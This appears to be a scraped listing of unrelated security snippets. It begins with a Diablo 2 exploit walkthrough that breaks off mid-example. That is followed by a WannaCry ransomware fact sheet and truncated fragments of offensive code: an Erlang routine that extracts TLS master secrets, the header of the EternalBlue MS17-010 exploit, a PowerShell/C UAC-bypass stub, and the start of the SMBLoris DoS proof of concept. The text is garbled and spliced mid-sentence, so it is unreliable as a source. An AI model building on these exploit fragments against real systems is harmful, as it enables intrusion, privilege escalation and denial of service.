Zhang M1suzu

This is a common-jargon walkthrough of an interesting Diablo 2 exploit. It provides the necessary background information (network protocol and game mechanics) to gain some understanding of the primitives from which it's constructed. Since the exploit is against a black-box network service with no available code, exact details and subtleties remain a mystery. :)

Exploit effects

Diablo 2 items can have a list of properties with various effects. The most common items (normal or "white" ones) have very few possible effects; however, all items can have sockets. Rune and gem-type items can be inserted into sockets. Some sequences of runes are special - inserting them into a white item makes a runeword item with predictable special properties.

Here's an example runeword "Peace" created by inserting Shael, Thul, and Amn runes into a 3-socket Light Plate:

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

	DumpMS = fun() ->
	FindMs = fun(Socket) ->
	Pid = element(3, Socket),
	Connection = sys:get_state(Pid),
	State = element(2, Connection),
	Session = element(18, State),
	SessionId = element(2, Session),
	MasterSecret = element(7, Session),
	{SessionId, MasterSecret}
	end,

	#!/usr/bin/env python3
	import struct
	import lief
	from lief.MachO import LOAD_COMMAND_TYPES, HEADER_FLAGS


	def check(filename):
	macho = lief.parse(filename)

	# check this?

	# based on code from http://trendystephen.blogspot.be/2008/01/rich-header.html
	import sys
	import struct

	# I'm trying not to bury the magic number...
	CHECKSUM_MASK = 0x536e6144 # DanS (actuall SnaD)
	RICH_TEXT = 'Rich'
	RICH_TEXT_LENGTH = len(RICH_TEXT)
	PE_START = 0x3c
	PE_FIELD_LENGTH = 4

	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 7/2008 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)

	# Powershell script to bypass UAC on Vista+ assuming
	# there exists one elevated process on the same desktop.
	# Technical details in:
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
	# You need to Install-Module NtObjectManager for this to run.

	Import-Module NtObjectManager

	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	/* SMBLoris attack proof-of-concept
	*
	* Copyright 2017 Hector Martin "marcan" <[email protected]>
	*
	* Licensed under the terms of the 2-clause BSD license.
	*
	* This is a proof of concept of a publicly disclosed vulnerability.
	* Please do not go around randomly DoSing people with it.
	*
	* Tips: do not use your local IP as source, or if you do, use iptables to block